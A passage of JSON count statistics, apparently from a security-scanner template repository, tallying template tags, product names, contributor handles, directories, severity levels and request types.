vsftpd","count":1},{"name":"asana","count":1},{"name":"instagram","count":1},{"name":"secmail","count":1},{"name":"lancom","count":1},{"name":"speed","count":1},{"name":"pacsone","count":1},{"name":"bigbluebutton","count":1},{"name":"raspap","count":1},{"name":"webftp","count":1},{"name":"myvuehelp","count":1},{"name":"svnserve","count":1},{"name":"sgp","count":1},{"name":"mysql","count":1},{"name":"magicflow","count":1},{"name":"rhymix","count":1},{"name":"csrfguard","count":1},{"name":"pihole","count":1},{"name":"embedthis","count":1},{"name":"springframework","count":1},{"name":"k8","count":1},{"name":"postmark","count":1},{"name":"glances","count":1},{"name":"announcekit","count":1},{"name":"anchorcms","count":1},{"name":"zmanda","count":1},{"name":"upnp","count":1},{"name":"csod","count":1},{"name":"mailgun","count":1},{"name":"myucms","count":1},{"name":"powercreator","count":1},{"name":"fortigates","count":1},{"name":"webui","count":1},{"name":"accela","count":1},{"name":"lutron","count":1},{"name":"appweb","count":1},{"name":"expn","count":1},{"name":"nuxeo","count":1},{"name":"oidc","count":1},{"name":"fedora","count":1},{"name":"cyberoam","count":1},{"name":"fortiweb","count":1},{"name":"nomad","count":1},{"name":"photo","count":1},{"name":"locations","count":1},{"name":"pmb","count":1},{"name":"smartsense","count":1},{"name":"empirecms","count":1},{"name":"opensns","count":1},{"name":"pcoip","count":1},{"name":"achecker","count":1},{"name":"tracer","count":1},{"name":"actuator","count":1},{"name":"phpinfo","count":1},{"name":"ipstack","count":1},{"name":"sarg","count":1},{"name":"okiko","count":1},{"name":"tileserver","count":1},{"name":"nerdgraph","count":1},{"name":"eyelock","count":1},{"name":"sprintful","count":1},{"name":"xunchi","count":1},{"name":"turbocrm","count":1},{"name":"lanproxy","count":1},{"name":"qsan","count":1},{"name":"etherpad","count":1},{"name":"openerp","count":1},{"name":"opencast","count":1},{"name":"ueditor","count":1},{"name":"basic-auth","count":1},{"name":"discourse","count":1},{"name":"cobub","count":1},{"name":"twitter-server","count":1},{"name":"bash","count":1},{"name":"wamp","count":1},{"name":"maxsite","count":1},{"name":"pendo","count":1},{"name":"xiuno","count":1},{"name":"xdcms","count":1},{"name":"mpsec","count":1},{"name":"chinaunicom","count":1},{"name":"shopizer","count":1},{"name":"ognl","count":1},{"name":"uwsgi","count":1},{"name":"pagerduty","count":1},{"name":"owa","count":1},{"name":"chevereto","count":1},{"name":"nc2","count":1},{"name":"clink-office","count":1},{"name":"tectuus","count":1},{"name":"database","count":1},{"name":"bookstack","count":1},{"name":"mantisbt","count":1},{"name":"mapbox","count":1},{"name":"webmodule-ee","count":1},{"name":"spring","count":1},{"name":"scimono","count":1},{"name":"viewlinc","count":1},{"name":"simplecrm","count":1},{"name":"imap","count":1},{"name":"sar2html","count":1},{"name":"cgi","count":1},{"name":"alertmanager","count":1},{"name":"ewebs","count":1},{"name":"daybyday","count":1},{"name":"cocoon","count":1},{"name":"nexusdb","count":1},{"name":"postgres","count":1},{"name":"ruby","count":1},{"name":"olivetti","count":1},{"name":"oneblog","count":1},{"name":"novnc","count":1},{"name":"werkzeug","count":1},{"name":"kerbynet","count":1},{"name":"rubedo","count":1},{"name":"spectracom","count":1},{"name":"axiom","count":1},{"name":"phpfusion","count":1},{"name":"calendly","count":1},{"name":"tor","count":1},{"name":"geutebruck","count":1},{"name":"tugboat","count":1},{"name":"wavlink","count":1},{"name":"realteo","count":1},{"name":"phalcon","count":1},{"name":"bullwark","count":1},{"name":"b2evolution","count":1},{"name":"remkon","count":1},{"name":"perl","count":1},{"name":"livezilla","count":1},{"name":"kindeditor","count":1},{"name":"faraday","count":1},{"name":"nweb2fax","count":1},{"name":"octoprint","count":1},{"name":"avtech","count":1},{"name":"robomongo","count":1},{"name":"redcap","count":1},{"name":"craftcms","count":1},{"name":"74cms","count":1},{"name":"checkpoint","count":1},{"name":"wing-ftp","count":1},{"name":"zzzcms","count":1},{"name":"jsp","count":1},{"name":"cloudron","count":1},{"name":"tpshop","count":1},{"name":"xmlchart","count":1},{"name":"st","count":1},{"name":"htmli","count":1},{"name":"salesforce","count":1},{"name":"ghost","count":1},{"name":"placeos","count":1},{"name":"gloo","count":1},{"name":"visualtools","count":1},{"name":"ioncube","count":1},{"name":"setup","count":1},{"name":"saltapi","count":1},{"name":"webadmin","count":1},{"name":"synnefo","count":1},{"name":"vnc","count":1},{"name":"sentry","count":1},{"name":"gespage","count":1},{"name":"omi","count":1},{"name":"argussurveillance","count":1},{"name":"skywalking","count":1},{"name":"mobileiron","count":1},{"name":"shoppable","count":1},{"name":"clave","count":1},{"name":"wildfly","count":1},{"name":"zms","count":1},{"name":"woocomernce","count":1},{"name":"logontracer","count":1},{"name":"ntopng","count":1},{"name":"elasticsearch","count":1},{"name":"parentlink","count":1},{"name":"kyan","count":1},{"name":"mantis","count":1},{"name":"mongoshake","count":1},{"name":"ganglia","count":1},{"name":"buttercms","count":1},{"name":"sceditor","count":1},{"name":"rmi","count":1},{"name":"zyxel","count":1},{"name":"nette","count":1},{"name":"fortilogger","count":1},{"name":"eg","count":1},{"name":"matrix","count":1},{"name":"jeewms","count":1},{"name":"plastic","count":1},{"name":"cherokee","count":1},{"name":"motorola","count":1},{"name":"javafaces","count":1},{"name":"nimble","count":1},{"name":"nps","count":1},{"name":"processmaker","count":1},{"name":"gogs","count":1},{"name":"sqlite","count":1},{"name":"jenkin","count":1},{"name":"wakatime","count":1},{"name":"key","count":1},{"name":"redwood","count":1},{"name":"kubeflow","count":1},{"name":"duomicms","count":1},{"name":"majordomo2","count":1},{"name":"geddy","count":1},{"name":"spip","count":1},{"name":"socomec","count":1},{"name":"varnish","count":1},{"name":"nordex","count":1},{"name":"zend","count":1},{"name":"weiphp","count":1},{"name":"asus","count":1},{"name":"camunda","count":1},{"name":"pippoint","count":1},{"name":"frontpage","count":1},{"name":"loqate","count":1},{"name":"nifi","count":1},{"name":"pgadmin","count":1},{"name":"nearby","count":1},{"name":"biometrics","count":1},{"name":"openweather","count":1},{"name":"fastcgi","count":1},{"name":"phpfastcache","count":1},{"name":"subrion","count":1},{"name":"haproxy","count":1},{"name":"graph","count":1},{"name":"octobercms","count":1},{"name":"tenda","count":1},{"name":"whm","count":1},{"name":"sonarcloud","count":1},{"name":"tensorflow","count":1},{"name":"timesheet","count":1},{"name":"burp","count":1},{"name":"openstack","count":1},{"name":"portainer","count":1},{"name":"vidyo","count":1},{"name":"mod-proxy","count":1},{"name":"xvr","count":1},{"name":"acexy","count":1},{"name":"youtube","count":1},{"name":"expressjs","count":1},{"name":"goahead","count":1},{"name":"primetek","count":1},{"name":"vsphere","count":1},{"name":"servicedesk","count":1},{"name":"digitalocean","count":1},{"name":"eprints","count":1},{"name":"mediumish","count":1},{"name":"natemail","count":1},{"name":"rujjie","count":1},{"name":"addpac","count":1},{"name":"websphere","count":1},{"name":"linksys","count":1},{"name":"monitorix","count":1},{"name":"wavemaker","count":1},{"name":"h3c-imc","count":1},{"name":"eyou","count":1},{"name":"cloudflare","count":1},{"name":"opensmtpd","count":1},{"name":"postmessage","count":1},{"name":"circle","count":1},{"name":"clockwork","count":1},{"name":"elfinder","count":1},{"name":"xml","count":1},{"name":"rmc","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":280},{"name":"dhiyaneshdk","count":273},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":66},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":50},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"nadino","count":10},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"oppsec","count":7},{"name":"emadshanab","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"kophjager007","count":7},{"name":"meme-lord","count":7},{"name":"dogasantos","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"divya_mudgal","count":6},{"name":"logicalhunter","count":6},{"name":"rootxharsh","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"lu4nx","count":5},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"iamnoooob","count":5},{"name":"johnk3r","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"incogbyte","count":4},{"name":"e_schultze_","count":4},{"name":"f1tz","count":3},{"name":"vsh00t","count":3},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"0w4ys","count":3},{"name":"skeltavik","count":3},{"name":"shine","count":3},{"name":"fyoorer","count":3},{"name":"sullo","count":3},{"name":"shifacyclewala","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"dudez","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"jarijaas","count":3},{"name":"tess","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"unstabl3","count":3},{"name":"me9187","count":3},{"name":"johnjhacking","count":3},{"name":"sushantkamble","count":3},{"name":"mavericknerd","count":3},{"name":"idealphase","count":3},{"name":"0xrudra","count":2},{"name":"dheerajmadhukar","count":2},{"name":"vavkamil","count":2},{"name":"bp0lr","count":2},{"name":"bsysop","count":2},{"name":"0xelkomy","count":2},{"name":"moritz nentwig","count":2},{"name":"g4l1t0","count":2},{"name":"convisoappsec","count":2},{"name":"nkxxkn","count":2},{"name":"parth","count":2},{"name":"huowuzhao","count":2},{"name":"whoever","count":2},{"name":"w4cky_","count":2},{"name":"davidmckennirey","count":2},{"name":"kiblyn11","count":2},{"name":"socketz","count":2},{"name":"swissky","count":2},{"name":"0xsmiley","count":2},{"name":"cocxanh","count":2},{"name":"joeldeleep","count":2},{"name":"sy3omda","count":2},{"name":"0xcrypto","count":2},{"name":"mohammedsaneem","count":2},{"name":"manas_harsh","count":2},{"name":"afaq","count":2},{"name":"amsda","count":2},{"name":"koti2","count":2},{"name":"bernardofsr","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"r3naissance","count":2},{"name":"zomsop82","count":2},{"name":"hetroublemakr","count":2},{"name":"gevakun","count":2},{"name":"foulenzer","count":2},{"name":"random-robbie","count":2},{"name":"ree4pwn","count":2},{"name":"0xsapra","count":2},{"name":"gal nagli","count":2},{"name":"hahwul","count":2},{"name":"alifathi-h1","count":2},{"name":"ehsahil","count":2},{"name":"lotusdll","count":2},{"name":"fabaff","count":2},{"name":"r12w4n","count":2},{"name":"arcc","count":2},{"name":"udit_thakkur","count":2},{"name":"bing0o","count":2},{"name":"x1m_martijn","count":2},{"name":"0xprial","count":2},{"name":"pxmme1337","count":2},{"name":"randomrobbie","count":2},{"name":"deena","count":1},{"name":"qlkwej","count":1},{"name":"_harleo","count":1},{"name":"rotemreiss","count":1},{"name":"jteles","count":1},{"name":"x6263","count":1},{"name":"thebinitghimire","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"makyotox","count":1},{"name":"b4uh0lz","count":1},{"name":"schniggie","count":1},{"name":"andysvints","count":1},{"name":"@ofjaaah","count":1},{"name":"b0rn2r00t","count":1},{"name":"daviey","count":1},{"name":"kurohost","count":1},{"name":"intx0x80","count":1},{"name":"sec_hawk","count":1},{"name":"forgedhallpass","count":1},{"name":"shreyapohekar","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"berkdusunur","count":1},{"name":"affix","count":1},{"name":"ilovebinbash","count":1},{"name":"fopina","count":1},{"name":"notsoevilweasel","count":1},{"name":"elmahdi","count":1},{"name":"rodnt","count":1},{"name":"oscarintherocks","count":1},{"name":"push4d","count":1},{"name":"thezakman","count":1},{"name":"droberson","count":1},{"name":"s1r1u5_","count":1},{"name":"kareemse1im","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"juicypotato1","count":1},{"name":"hanlaomo","count":1},{"name":"mhdsamx","count":1},{"name":"akash.c","count":1},{"name":"d0rkerdevil","count":1},{"name":"apt-mirror","count":1},{"name":"revblock","count":1},{"name":"0xrod","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"ipanda","count":1},{"name":"ooooooo_q","count":1},{"name":"omarkurt","count":1},{"name":"wabafet","count":1},{"name":"alperenkesk","count":1},{"name":"adrianmf","count":1},{"name":"naglinagli","count":1},{"name":"chron0x","count":1},{"name":"jeya seelan","count":1},{"name":"ringo","count":1},{"name":"undefl0w","count":1},{"name":"yavolo","count":1},{"name":"pudsec","count":1},{"name":"pratik khalane","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"elder tao","count":1},{"name":"elouhi","count":1},{"name":"kabirsuda","count":1},{"name":"furkansenan","count":1},{"name":"ldionmarcil","count":1},{"name":"mubassirpatel","count":1},{"name":"ahmetpergamum","count":1},{"name":"ohlinge","count":1},{"name":"andirrahmani1","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"lark lab","count":1},{"name":"noamrathaus","count":1},{"name":"akshansh","count":1},{"name":"alph4byt3","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"absshax","count":1},{"name":"dawid-czarnecki","count":1},{"name":"its0x08","count":1},{"name":"jrolf","count":1},{"name":"smaranchand","count":1},{"name":"_darrenmartyn","count":1},{"name":"th3.d1p4k","count":1},{"name":"sicksec","count":1},{"name":"0xd0ff9","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"kre80r","count":1},{"name":"nytr0gen","count":1},{"name":"yashgoti","count":1},{"name":"alex","count":1},{"name":"taielab","count":1},{"name":"patralos","count":1},{"name":"ahmed sherif","count":1},{"name":"mass0ma","count":1},{"name":"0xteles","count":1},{"name":"0ut0fb4nd","count":1},{"name":"philippdelteil","count":1},{"name":"hakluke","count":1},{"name":"borna nematzadeh","count":1},{"name":"xstp","count":1},{"name":"thevillagehacker","count":1},{"name":"orpheus","count":1},{"name":"bad5ect0r","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"pdp","count":1},{"name":"aresx","count":1},{"name":"exploitation","count":1},{"name":"@dwisiswant0","count":1},{"name":"infosecsanyam","count":1},{"name":"defr0ggy","count":1},{"name":"sickwell","count":1},{"name":"zandros0","count":1},{"name":"remonsec","count":1},{"name":"0xtavian","count":1},{"name":"nerrorsec","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"iampritam","count":1},{"name":"tirtha_mandal","count":1},{"name":"co0nan","count":1},{"name":"willd96","count":1},{"name":"gboddin","count":1},{"name":"izn0u","count":1},{"name":"52971","count":1},{"name":"luskabol","count":1},{"name":"retr0","count":1},{"name":"blckraven","count":1},{"name":"bolli95","count":1},{"name":"evolutionsec","count":1},{"name":"clarkvoss","count":1},{"name":"soyelmago","count":1},{"name":"j33n1k4","count":1},{"name":"streetofhackerr007","count":1},{"name":"shelld3v","count":1},{"name":"0h1in9e","count":1},{"name":"rojanrijal","count":1},{"name":"geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"un-fmunozs","count":1},{"name":"petruknisme","count":1},{"name":"udyz","count":1},{"name":"zhenwarx","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"toufik airane","count":1},{"name":"yashanand155","count":1},{"name":"becivells","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"bjhulst","count":1},{"name":"vzamanillo","count":1},{"name":"luci","count":1},{"name":"whynotke","count":1},{"name":"knassar702","count":1},{"name":"manuelbua","count":1},{"name":"mesaglio","count":1},{"name":"c3l3si4n","count":1},{"name":"raesene","count":1},{"name":"regala_","count":1},{"name":"flag007","count":1},{"name":"b0yd","count":1},{"name":"mah3sec_","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"sshell","count":1},{"name":"brabbit10","count":1},{"name":"tim_koopmans","count":1},{"name":"micha3lb3n","count":1},{"name":"shifacyclewla","count":1},{"name":"_c0wb0y_","count":1},{"name":"fmunozs","count":1},{"name":"nvn1729","count":1},{"name":"ajaysenr","count":1}],"directory":[{"name":"cves","count":831},{"name":"vulnerabilities","count":324},{"name":"exposed-panels","count":264},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":139},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":743},{"name":"high","count":641},{"name":"medium","count":474},{"name":"critical","count":294},{"name":"low","count":155}],"types":[{"name":"http","count":2195},{"name":"file","count":50},{"name":"network","count":45},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":828},{"name":"lfi","count":340},{"name":"panel","count":272},{"name":"xss","count":258},{"name":"wordpress","count":252},{"name":"exposure","count":239},{"name":"rce","count":212},{"name":"tech","count":195},{"name":"wp-plugin","count":175},{"name":"cve2020","count":164},{"name":"cve2021","count":155},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":88},{"name":"apache","count":73},{"name":"takeover","count":69},{"name":"default-login","count":68},{"name":"oob","count":68},{"name":"iot","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":43},{"name":"ssrf","count":41},{"name":"sqli","count":40},{"name":"","count":38},{"name":"redirect","count":37},{"name":"cve2016","count":37},{"name":"oracle","count":36},{"name":"logs","count":30},{"name":"google","count":30},{"name":"atlassian","count":29},{"name":"jira","count":29},{"name":"cve2015","count":29},{"name":"cisco","count":27},{"name":"cve2014","count":27},{"name":"listing","count":27},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"misc","count":23},{"name":"disclosure","count":23},{"name":"router","count":21},{"name":"misconfig","count":21},{"name":"aem","count":19},{"name":"sap","count":18},{"name":"cve2012","count":18},{"name":"springboot","count":18},{"name":"debug","count":18},{"name":"php","count":16},{"name":"cve2011","count":15},{"name":"devops","count":15},{"name":"weblogic","count":14},{"name":"fuzz","count":14},{"name":"struts","count":14},{"name":"login","count":14},{"name":"cve2009","count":14},{"name":"aws","count":14},{"name":"adobe","count":13},{"name":"zoho","count":13},{"name":"deserialization","count":13},{"name":"dns","count":13},{"name":"android","count":13},{"name":"wp-theme","count":12},{"name":"dlink","count":12},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"magento","count":11},{"name":"cve2013","count":11},{"name":"hp","count":10},{"name":"xxe","count":10},{"name":"intrusive","count":10},{"name":"dell","count":10},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"kubernetes","count":9},{"name":"cve2008","count":8},{"name":"fastjson","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"microsoft","count":8},{"name":"nginx","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"scada","count":8},{"name":"backup","count":8},{"name":"ibm","count":8},{"name":"files","count":7},{"name":"confluence","count":7},{"name":"cms","count":7},{"name":"netgear","count":7},{"name":"coldfusion","count":7},{"name":"phpmyadmin","count":6},{"name":"jetty","count":6},{"name":"nodejs","count":6},{"name":"citrix","count":6},{"name":"drupal","count":6},{"name":"lucee","count":6},{"name":"solr","count":6},{"name":"fileupload","count":6},{"name":"rconfig","count":6},{"name":"django","count":6},{"name":"docker","count":6},{"name":"camera","count":6},{"name":"api","count":6},{"name":"laravel","count":6},{"name":"dedecms","count":5},{"name":"circarlife","count":5},{"name":"tomcat","count":5},{"name":"crlf","count":5},{"name":"printer","count":5},{"name":"java","count":5},{"name":"ssti","count":5},{"name":"jolokia","count":5},{"name":"headless","count":5},{"name":"windows","count":5},{"name":"iis","count":5},{"name":"maps","count":4},{"name":"samsung","count":4},{"name":"asp","count":4},{"name":"vpn","count":4},{"name":"solarwinds","count":4},{"name":"buffalo","count":4},{"name":"symantec","count":4},{"name":"glpi","count":4},{"name":"magmi","count":4},{"name":"thinkphp","count":4},{"name":"strapi","count":4},{"name":"git","count":4},{"name":"npm","count":4},{"name":"slack","count":4},{"name":"zabbix","count":4},{"name":"zimbra","count":4},{"name":"fatpipe","count":4},{"name":"artifactory","count":4},{"name":"firmware","count":4},{"name":"proxy","count":4},{"name":"symfony","count":4},{"name":"firebase","count":4},{"name":"amazon","count":4},{"name":"hongdian","count":4},{"name":"traversal","count":4},{"name":"wso2","count":4},{"name":"moodle","count":4},{"name":"resin","count":4},{"name":"rfi","count":4},{"name":"exchange","count":4},{"name":"webserver","count":4},{"name":"grafana","count":4},{"name":"elastic","count":4},{"name":"thinkcmf","count":4},{"name":"nacos","count":3},{"name":"lansweeper","count":3},{"name":"linkerd","count":3},{"name":"tikiwiki","count":3},{"name":"github","count":3},{"name":"mail","count":3},{"name":"vbulletin","count":3},{"name":"kafka","count":3},{"name":"ebs","count":3},{"name":"terramaster","count":3},{"name":"targa","count":3},{"name":"mongodb","count":3},{"name":"cve2007","count":3},{"name":"lfr","count":3},{"name":"microstrategy","count":3},{"name":"jeesns","count":3},{"name":"prometheus","count":3},{"name":"caucho","count":3},{"name":"fanruan","count":3},{"name":"bitrix","count":3},{"name":"exposures","count":3},{"name":"kibana","count":3},{"name":"oa","count":3},{"name":"zhiyuan","count":3},{"name":"fpd","count":3},{"name":"openssh","count":3},{"name":"r-seenet","count":3},{"name":"node","count":3},{"name":"cves","count":3},{"name":"telerik","count":3},{"name":"nosqli","count":3},{"name":"openam","count":3},{"name":"druid","count":3},{"name":"backdoor","count":3},{"name":"smtp","count":3},{"name":"azure","count":3},{"name":"httpd","count":3},{"name":"bigip","count":3},{"name":"injection","count":3},{"name":"ssh","count":3},{"name":"ofbiz","count":3},{"name":"cacti","count":3},{"name":"kevinlab","count":3},{"name":"search","count":3},{"name":"opensis","count":3},{"name":"itop","count":3},{"name":"hoteldruid","count":3},{"name":"springcloud","count":3},{"name":"jellyfin","count":3},{"name":"nexus","count":3},{"name":"log","count":3},{"name":"cloud","count":3},{"name":"ilo","count":2},{"name":"prtg","count":2},{"name":"bruteforce","count":2},{"name":"vrealize","count":2},{"name":"embed","count":2},{"name":"harbor","count":2},{"name":"xxljob","count":2},{"name":"ec2","count":2},{"name":"guacamole","count":2},{"name":"places","count":2},{"name":"kong","count":2},{"name":"axis2","count":2},{"name":"fortios","count":2},{"name":"flir","count":2},{"name":"emerge","count":2},{"name":"electron","count":2},{"name":"wordfence","count":2},{"name":"waf","count":2},{"name":"rancher","count":2},{"name":"service","count":2},{"name":"smb","count":2},{"name":"db","count":2},{"name":"nagios","count":2},{"name":"prestashop","count":2},{"name":"qcubed","count":2},{"name":"leak","count":2},{"name":"oauth","count":2},{"name":"openvpn","count":2},{"name":"glassfish","count":2},{"name":"phpcollab","count":2},{"name":"seeyon","count":2},{"name":"upload","count":2},{"name":"netis","count":2},{"name":"yapi","count":2},{"name":"showdoc","count":2},{"name":"totemomail","count":2},{"name":"cache","count":2},{"name":"kentico","count":2},{"name":"grav","count":2},{"name":"frp","count":2},{"name":"lotus","count":2},{"name":"getsimple","count":2},{"name":"saltstack","count":2},{"name":"bucket","count":2},{"name":"linux","count":2},{"name":"ucmdb","count":2},{"name":"dos","count":2},{"name":"chiyu","count":2},{"name":"trixbox","count":2},{"name":"yii","count":2},{"name":"geowebserver","count":2},{"name":"aruba","count":2},{"name":"jsf","count":2},{"name":"icewarp","count":2},{"name":"minio","count":2},{"name":"splunk","count":2},{"name":"hpe","count":2},{"name":"rstudio","count":2},{"name":"s3","count":2},{"name":"huawei","count":2},{"name":"bypass","count":2},{"name":"nextjs","count":2},{"name":"middleware","count":2},{"name":"akkadian","count":2},{"name":"sharepoint","count":2},{"name":"mida","count":2},{"name":"status","count":2},{"name":"horde","count":2},{"name":"mcafee","count":2},{"name":"jboss","count":2},{"name":"voipmonitor","count":2},{"name":"mailchimp","count":2},{"name":"backups","count":2},{"name":"commax","count":2},{"name":"hostheader-injection","count":2},{"name":"idrac","count":2},{"name":"keycloak","count":2},{"name":"couchdb","count":2},{"name":"pega","count":2},{"name":"hashicorp","count":2},{"name":"odoo","count":2},{"name":"heroku","count":2},{"name":"chyrp","count":2},{"name":"hjtcloud","count":2},{"name":"sonarqube","count":2},{"name":"natshell","count":2},{"name":"qihang","count":2},{"name":"justwriting","count":2},{"name":"wuzhicms","count":2},{"name":"activemq","count":2},{"name":"sonicwall","count":2},{"name":"adminer","count":2},{"name":"ecoa","count":2},{"name":"text","count":2},{"name":"liferay","count":2},{"name":"aviatrix","count":2},{"name":"netsweeper","count":2},{"name":"maian","count":2},{"name":"vcenter","count":2},{"name":"paloalto","count":2},{"name":"tidb","count":2},{"name":"avantfax","count":2},{"name":"shellshock","count":2},{"name":"sitecore","count":2},{"name":"storage","count":2},{"name":"ecology","count":2},{"name":"cve2005","count":2},{"name":"akamai","count":2},{"name":"globalprotect","count":2},{"name":"enumeration","count":2},{"name":"jeedom","count":2},{"name":"spark","count":2},{"name":"favicon","count":2},{"name":"chamilo","count":2},{"name":"openfire","count":2},{"name":"payara","count":2},{"name":"dolibarr","count":2},{"name":"nextcloud","count":2},{"name":"rockmongo","count":2},{"name":"axis","count":2},{"name":"bitly","count":2},{"name":"hasura","count":2},{"name":"plesk","count":2},{"name":"webcam","count":2},{"name":"igs","count":2},{"name":"cocoon","count":1},{"name":"ns","count":1},{"name":"gogs","count":1},{"name":"rmi","count":1},{"name":"csrfguard","count":1},{"name":"lg-nas","count":1},{"name":"nomad","count":1},{"name":"domxss","count":1},{"name":"geocode","count":1},{"name":"esmtp","count":1},{"name":"bookstack","count":1},{"name":"limit","count":1},{"name":"linkedin","count":1},{"name":"fiori","count":1},{"name":"eg","count":1},{"name":"mobileiron","count":1},{"name":"cse","count":1},{"name":"geddy","count":1},{"name":"rhymix","count":1},{"name":"lanproxy","count":1},{"name":"hortonworks","count":1},{"name":"rockethchat","count":1},{"name":"opensmtpd","count":1},{"name":"rdp","count":1},{"name":"sentry","count":1},{"name":"testrail","count":1},{"name":"clusterengine","count":1},{"name":"seacms","count":1},{"name":"vnc","count":1},{"name":"craftcms","count":1},{"name":"ulterius","count":1},{"name":"bigbluebutton","count":1},{"name":"checkpoint","count":1},{"name":"dvwa","count":1},{"name":"fortilogger","count":1},{"name":"timesheet","count":1},{"name":"codeigniter","count":1},{"name":"aspnuke","count":1},{"name":"key","count":1},{"name":"redwood","count":1},{"name":"office365","count":1},{"name":"ruby","count":1},{"name":"wavemaker","count":1},{"name":"instagram","count":1},{"name":"ghost","count":1},{"name":"jquery","count":1},{"name":"fastcgi","count":1},{"name":"netdata","count":1},{"name":"mailgun","count":1},{"name":"blackboard","count":1},{"name":"zenario","count":1},{"name":"dotclear","count":1},{"name":"htmli","count":1},{"name":"bolt","count":1},{"name":"rsyncd","count":1},{"name":"maccmsv10","count":1},{"name":"parentlink","count":1},{"name":"eprints","count":1},{"name":"phpfastcache","count":1},{"name":"mara","count":1},{"name":"jeewms","count":1},{"name":"bing","count":1},{"name":"nps","count":1},{"name":"zms","count":1},{"name":"h3c-imc","count":1},{"name":"rabbitmq","count":1},{"name":"spotify","count":1},{"name":"comodo","count":1},{"name":"scimono","count":1},{"name":"directions","count":1},{"name":"panabit","count":1},{"name":"javascript","count":1},{"name":"octobercms","count":1},{"name":"erp-nc","count":1},{"name":"nifi","count":1},{"name":"twitter-server","count":1},{"name":"grails","count":1},{"name":"whm","count":1},{"name":"jnoj","count":1},{"name":"empirecms","count":1},{"name":"gunicorn","count":1},{"name":"solman","count":1},{"name":"tensorboard","count":1},{"name":"lotuscms","count":1},{"name":"timeclock","count":1},{"name":"iterable","count":1},{"name":"route","count":1},{"name":"74cms","count":1},{"name":"mkdocs","count":1},{"name":"auth","count":1},{"name":"weather","count":1},{"name":"owa","count":1},{"name":"elascticsearch","count":1},{"name":"tcexam","count":1},{"name":"etherpad","count":1},{"name":"cofax","count":1},{"name":"cherokee","count":1},{"name":"pagespeed","count":1},{"name":"netmask","count":1},{"name":"jitsi","count":1},{"name":"lighttpd","count":1},{"name":"pihole","count":1},{"name":"monitorix","count":1},{"name":"ems","count":1},{"name":"websphere","count":1},{"name":"gitlist","count":1},{"name":"gespage","count":1},{"name":"rubedo","count":1},{"name":"soar","count":1},{"name":"wifisky","count":1},{"name":"javafaces","count":1},{"name":"resourcespace","count":1},{"name":"stripe","count":1},{"name":"myucms","count":1},{"name":"phalcon","count":1},{"name":"tor","count":1},{"name":"robomongo","count":1},{"name":"sophos","count":1},{"name":"miscrsoft","count":1},{"name":"oscommerce","count":1},{"name":"alibaba","count":1},{"name":"glances","count":1},{"name":"ueditor","count":1},{"name":"werkzeug","count":1},{"name":"acontent","count":1},{"name":"nordex","count":1},{"name":"twitter","count":1},{"name":"secmail","count":1},{"name":"contentkeeper","count":1},{"name":"expn","count":1},{"name":"autocomplete","count":1},{"name":"sprintful","count":1},{"name":"smartsense","count":1},{"name":"travis","count":1},{"name":"dropbox","count":1},{"name":"distance","count":1},{"name":"nsasg","count":1},{"name":"